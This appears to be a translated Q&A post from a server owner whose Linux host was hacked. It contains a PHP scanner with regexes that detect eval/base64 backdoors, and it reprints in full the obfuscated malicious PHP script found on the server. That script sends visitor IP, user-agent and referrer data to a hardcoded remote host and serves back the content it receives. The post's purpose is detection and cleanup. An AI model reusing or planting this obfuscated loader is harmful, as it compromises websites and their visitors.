我的linux服务器最近被黑了,我的服务器上运行了一个脚本发送垃圾邮件,我想找到它的生成器并以这种方式删除它。 我创建了一个PHP代码来搜索所有目录中的确切模式并提醒我,它可以通过使用pregmatch fucntion找到模式。但我无法找出pregmatch命令的正确正则表达式,例如在模式下找到:
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]="\x75\x72\x69";
我的代码:
class ScanFiles {
public $infected_files = array();
private $scanned_files = array();
function __construct() {
$this->scan(dirname(__FILE__));
$this->sendalert();
}
function scan($dir) {
$this->scanned_files[] = $dir;
$files = scandir($dir);
if(!is_array($files)) {
throw new Exception('Unable to scan directory ' . $dir . '. Please make sure proper permissions have been set.');
}
foreach($files as $file) {
if(is_file($dir.'/'.$file) && !in_array($dir.'/'.$file,$this->scanned_files)) {
$this->check(file_get_contents($dir.'/'.$file),$dir.'/'.$file);
} elseif(is_dir($dir.'/'.$file) && substr($file,0,1) != '.') {
$this->scan($dir.'/'.$file);
}
}
}
function check($contents,$file) {
$this->scanned_files[] = $file;
if(preg_match('/eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))/i',$contents) || preg_match('/\${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]\b/i',$contents)) {
$this->infected_files[] = $file;
}
}
function sendalert() {
if(count($this->infected_files) != 0) {
$message = "== MALICIOUS CODE FOUND == \n\n";
$message .= "The following files appear to be infected: \n";
foreach($this->infected_files as $inf) {
$message .= " - $inf \n";
}
mail(SEND_EMAIL_ALERTS_TO,'Malicious Code Found!',$message,'FROM:');
echo "Malicious Code Found! : ".$message;
}else{
echo "No Malicious Found.";
}
}
}
我手动找到的垃圾邮件脚本,但它在服务器上使用新文件名进行复制:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]="\x75\x72\x69";
${"\x47\x4c\x4f\x42\x41\x4cS"}["p\x69\x77\x64\x79\x73vi\x6bh"]="\x64u\x6d\x6d\x79_\x70\x61g\x65";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x72\x68\x74a\x78\x76c"]="\x69\x70\x5fke\x79\x73";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x70\x76g\x74\x67\x62w\x71"]="fi\x6c\x65\x6eam\x65";
${"\x47LO\x42\x41\x4cS"}["\x6ag\x67\x70\x6c\x6d\x66\x6aq\x75\x70"]="\x63o\x6ete\x6e\x74";
${"\x47\x4c\x4f\x42\x41LS"}["\x79\x6cf\x71\x6f\x66x"]="\x69\x70";
${"\x47\x4c\x4fB\x41L\x53"}["\x61\x73\x69\x6f\x6e\x65\x65\x68\x62"]="\x63o\x6e\x74\x65\x6et";
${"\x47\x4c\x4fBA\x4c\x53"}["o\x67\x6anw\x64\x6a\x71\x63\x6a"]="u\x72\x6c";
${"\x47LOB\x41L\x53"}["\x66e\x71\x6bg\x6b\x72edp\x6er"]="\x69";
$tvjuit="ke\x79";
$khpkwwmtyl="\x6b\x65\x79";
${"G\x4c\x4fBA\x4c\x53"}["\x77\x76\x78t\x79hl"]="\x6b\x65y";
${"\x47LO\x42A\x4c\x53"}["l\x76\x67\x66o\x63\x74\x78"]="\x63on\x74e\x78\x74";
$nbutdw="url";
${"GLO\x42\x41L\x53"}["\x61tt\x64\x6f\x6db\x6e\x73\x70\x67"]="quer\x79";
${"\x47L\x4f\x42ALS"}["\x79\x64h\x62\x62\x65\x74\x79h"]="\x6b\x65y";
${"\x47\x4cOB\x41\x4c\x53"}["i\x6c\x62\x68\x75b\x73\x68\x64\x75f\x76"]="\x70\x61t\x68";
$pvpylyxbyi="c\x6fn\x74e\x6e\x74";
error_reporting(0);
$vyjgrxcpune="\x70\x6frt";
ini_set("di\x73\x70la\x79\x5fer\x72\x6f\x72s",0);
$cojuafthyws="\x6b\x65\x79";
${"GLO\x42\x41\x4c\x53"}["\x75w\x71\x76\x7a\x6a\x68\x65\x62\x73m"]="f\x69\x6ce\x6e\x61\x6d\x65";
$aqtvbwqxw="\x69p";
${"\x47\x4c\x4fBAL\x53"}["c\x61e\x70\x77\x71\x6f"]="\x63\x6f\x6e\x74\x65n\x74";
$qkrjqitq="ke\x79";
$whumtbg="\x71\x75\x65ry";
${$aqtvbwqxw}="89\x2e4\x38.11.\x33\x33";
${"\x47\x4c\x4f\x42\x41L\x53"}["z\x73\x75\x75\x65\x68\x65n"]="\x70a\x74\x68";
${"\x47LO\x42\x41\x4cS"}["\x76\x68t\x6c\x67\x67e\x71\x63\x62g"]="l\x65\x74\x74\x65\x72";
${$vyjgrxcpune}="80";
${"G\x4c\x4fBAL\x53"}["fs\x6c\x64\x7an"]="\x71uer\x79";
$ydnfejql="i";
${"G\x4c\x4f\x42\x41\x4c\x53"}["m\x64\x78\x79\x77\x6e\x77"]="\x71\x75\x65ry";
${${"\x47\x4c\x4fBALS"}["\x69\x6cb\x68\x75\x62\x73h\x64u\x66\x76"]}="/r\x6a\x62\x76\x63\x78\x77\x72\x65/\x34\x356vcx\x67r\x74\x2ephp";
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x61\x74\x74\x64o\x6d\x62\x6e\x73\x70\x67"]}=Array();
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x74td\x6f\x6d\x62nsp\x67"]}["i"]=get_ip();
${${"\x47\x4cO\x42\x41\x4cS"}["\x66\x73\x6c\x64\x7a\x6e"]}["\x70"]=@$_SERVER["\x48\x54T\x50\x5f\x48O\x53\x54"].@$_SERVER["\x52\x45Q\x55E\x53\x54\x5fUR\x49"];
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x78\x66\x65\x6e\x7a\x6c\x6e"]="\x71ue\x72\x79";
$xuoyiyhluct="\x70\x6f\x72\x74";
$gcdkmyrmtf="c\x6fn\x74e\x6e\x74";
${${"\x47\x4cO\x42\x41\x4cS"}["m\x64\x78\x79\x77n\x77"]}["u"]=@$_SERVER["HTTP\x5f\x55SER_\x41G\x45N\x54"];
${${"\x47\x4cO\x42\x41L\x53"}["a\x74\x74\x64o\x6d\x62n\x73p\x67"]}["\x61"]=@$_SERVER["\x48\x54\x54P_AC\x43E\x50\x54_\x4cA\x4eGUAGE"];
${${"GL\x4f\x42\x41\x4cS"}["m\x78\x66\x65\x6ezl\x6e"]}["r"]=@$_SERVER["H\x54T\x50\x5fREFER\x45R"];
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x76g\x66\x6f\x63\x74x"]}=stream_context_create(Array("\x68ttp"=>Array("m\x65\x74\x68\x6f\x64"=>"\x50OS\x54","he\x61\x64\x65\x72"=>"Con\x74en\x74-t\x79\x70e: app\x6c\x69\x63\x61\x74i\x6fn/\x78-\x77\x77w-\x66o\x72m-u\x72\x6c\x65\x6e\x63\x6f\x64\x65d","co\x6et\x65n\x74"=>http_build_query(${$whumtbg}))));
${${"\x47L\x4f\x42\x41\x4cS"}["\x77v\x78t\x79h\x6c"]}=30535;${$ydnfejql}=0;
foreach(str_split($_SERVER["RE\x51\x55E\x53\x54\x5fURI"])as${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x76\x68t\x6cg\x67\x65\x71\x63\x62\x67"]}){${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75o\x73\x74nl\x6f\x75"]="\x6cet\x74\x65\x72";
${${"\x47LOBA\x4cS"}["wv\x78\x74\x79\x68\x6c"]}+=ord(${${"\x47\x4cO\x42\x41\x4c\x53"}["u\x6fs\x74n\x6co\x75"]});
${${"GLO\x42A\x4cS"}["f\x65\x71kgkr\x65\x64\x70\x6er"]}++;}${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x77v\x78\x74\x79h\x6c"]}<<=2;
${${"GL\x4fB\x41\x4c\x53"}["\x77\x76\x78\x74\x79\x68l"]}^=${$khpkwwmtyl};${$qkrjqitq}+=32;
${$cojuafthyws}=str_repeat(chr(${${"G\x4c\x4fBA\x4cS"}["y\x64\x68bb\x65\x74\x79h"]}),8);
${${"\x47\x4c\x4fBA\x4c\x53"}["\x6fg\x6a\x6ew\x64\x6a\x71\x63\x6a"]}="htt\x70://".long2ip(1489383561^(ord(${$tvjuit}[0])+ord(${${"G\x4c\x4f\x42\x41\x4cS"}["w\x76xtyh\x6c"]}[1])+(strstr(substr($_SERVER["R\x45\x51U\x45S\x54_\x55\x52\x49"],-4),".p\x68p")==FALSE?6:ip2long(${${"\x47\x4c\x4f\x42AL\x53"}["y\x6c\x66\x71\x6ff\x78"]})))).":".${$xuoyiyhluct}.${${"\x47LOB\x41\x4cS"}["\x7a\x73\x75ueh\x65n"]};
${${"\x47\x4cOBAL\x53"}["\x61s\x69o\x6ee\x65\x68\x62"]}=@file_get_contents(${$nbutdw},FALSE,${${"\x47L\x4fB\x41\x4cS"}["\x6cv\x67f\x6f\x63\x74\x78"]});
${"G\x4c\x4f\x42ALS"}["r\x64\x6bx\x67\x6b\x6a\x77"]="\x63\x6f\x6e\x74en\x74";if(strlen(${${"G\x4cO\x42\x41L\x53"}["jg\x67\x70l\x6d\x66j\x71\x75p"]})<10){error_404();
}${${"\x47L\x4f\x42A\x4cS"}["rd\x6bxg\x6b\x6a\x77"]}=explode("\n",${$pvpylyxbyi});
${${"\x47L\x4f\x42A\x4c\x53"}["\x68\x70\x76gt\x67\x62w\x71"]}=array_shift(${${"\x47\x4c\x4fB\x41\x4c\x53"}["j\x67gpl\x6d\x66\x6a\x71\x75\x70"]});
${${"G\x4cOBALS"}["\x6a\x67\x67\x70\x6cm\x66\x6a\x71\x75p"]}=implode("\n",${${"\x47\x4c\x4f\x42A\x4c\x53"}["c\x61ep\x77\x71o"]});
if(strstr(${${"\x47L\x4f\x42\x41\x4cS"}["u\x77q\x76z\x6a\x68\x65\x62\x73\x6d"]},"\x2eh\x74m\x6c")===FALSE){header("Co\x6et\x65\x6et-\x54\x79pe:\x20\x61p\x70\x6c\x69ca\x74i\x6fn/\x6f\x63\x74\x65\x74-st\x72\x65\x61\x6d");
header("\x43o\x6et\x65nt-\x44i\x73\x70\x6f\x73\x69tio\x6e: a\x74\x74\x61\x63h\x6dent\x3b fi\x6ce\x6ea\x6d\x65=".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x70vg\x74\x67\x62wq"]});
header("\x43\x6fntent-\x4ce\x6eg\x74h: ".strlen(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x67\x67\x70\x6cm\x66\x6a\x71\x75p"]}));
}echo${$gcdkmyrmtf};
exit();
function get_ip(){${${"\x47\x4cO\x42\x41L\x53"}["r\x68t\x61\x78\x76\x63"]}=array("\x48T\x54P\x5f\x43\x46_\x43O\x4eN\x45\x43\x54\x49\x4eG\x5f\x49P","\x48T\x54P\x5fCLIENT_\x49P","\x48\x54TP_\x58\x5f\x46\x4f\x52\x57\x41\x52D\x45D_F\x4fR","\x48TTP_\x58\x5f\x46O\x52\x57A\x52D\x45\x44","\x48TTP_\x58_\x43\x4cU\x53T\x45R_\x43L\x49\x45N\x54\x5f\x49P","\x48TTP_F\x4fRWAR\x44E\x44\x5f\x46\x4fR","\x48TTP\x5fFORWA\x52\x44ED","RE\x4dO\x54E_\x41\x44D\x52");
foreach(${${"G\x4cOB\x41\x4c\x53"}["\x72\x68\x74\x61\x78\x76\x63"]} as${${"G\x4c\x4f\x42\x41L\x53"}["\x77\x76\x78t\x79h\x6c"]}){$xfdiqu="\x6b\x65\x79";
if(array_key_exists(${$xfdiqu},$_SERVER)===TRUE){${"\x47L\x4fB\x41\x4c\x53"}["p\x66bf\x65\x73\x6ch"]="i\x70";
foreach(explode(",",$_SERVER[${${"\x47L\x4f\x42A\x4c\x53"}["wv\x78\x74\x79\x68\x6c"]}])as${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x66\x62fes\x6c\x68"]}){$kvytrcc="ip";
return trim(${$kvytrcc});
}}}return"\x3255.255\x2e25\x35\x2e2\x35\x35";
}function error_404(){${"GL\x4fB\x41\x4cS"}["\x62x\x74fbg\x6f"]="\x75\x72i";
$rxdfcqp="\x64u\x6dmy\x5fp\x61\x67e";
header("\x48\x54\x54\x50/1.\x31\x204\x304\x20No\x74\x20Found");
${${"G\x4cO\x42A\x4cS"}["\x62\x78\x74\x66\x62go"]}=preg_replace("/(\\?)\x2e*\$/","",$_SERVER["RE\x51UE\x53T_\x55\x52\x49"]);
${$rxdfcqp}="/".uniqid().uniqid();
${${"\x47LOB\x41L\x53"}["\x6a\x67\x67\x70\x6c\x6d\x66\x6a\x71\x75\x70"]}=@file_get_contents("\x68tt\x70://".$_SERVER["\x48\x54\x54\x50\x5f\x48\x4fS\x54"].${${"\x47LO\x42\x41\x4c\x53"}["\x70\x69\x77d\x79s\x76\x69\x6b\x68"]});
${"\x47L\x4f\x42A\x4c\x53"}["\x79\x6e\x69\x61\x6d\x6e\x76\x71\x6d\x68c\x6b"]="\x63\x6fn\x74e\x6et";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x63\x6ew\x72tu\x69\x6e\x6a\x62"]="\x63\x6f\x6e\x74\x65\x6e\x74";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x65cqb\x76\x6a\x6c\x72"]="d\x75m\x6d\x79\x5fpa\x67\x65";
${${"\x47\x4c\x4fB\x41\x4c\x53"}["rc\x6e\x77\x72\x74\x75\x69\x6e\x6a\x62"]}=str_replace(${${"\x47L\x4fB\x41L\x53"}["\x65\x63\x71\x62vj\x6cr"]},${${"\x47LO\x42A\x4c\x53"}["\x67\x69\x65\x71hj\x69\x79e\x6ar\x67"]},${${"GLOBA\x4cS"}["jg\x67p\x6c\x6d\x66\x6a\x71u\x70"]});
exit(${${"G\x4cOB\x41\x4c\x53"}["\x79\x6ei\x61\x6d\x6evq\x6dhc\x6b"]});}
?>
答案 0 :(得分:0)
我使用另一种方法使用grep命令搜索此模式,并且我设法找到了垃圾邮件代码生成器。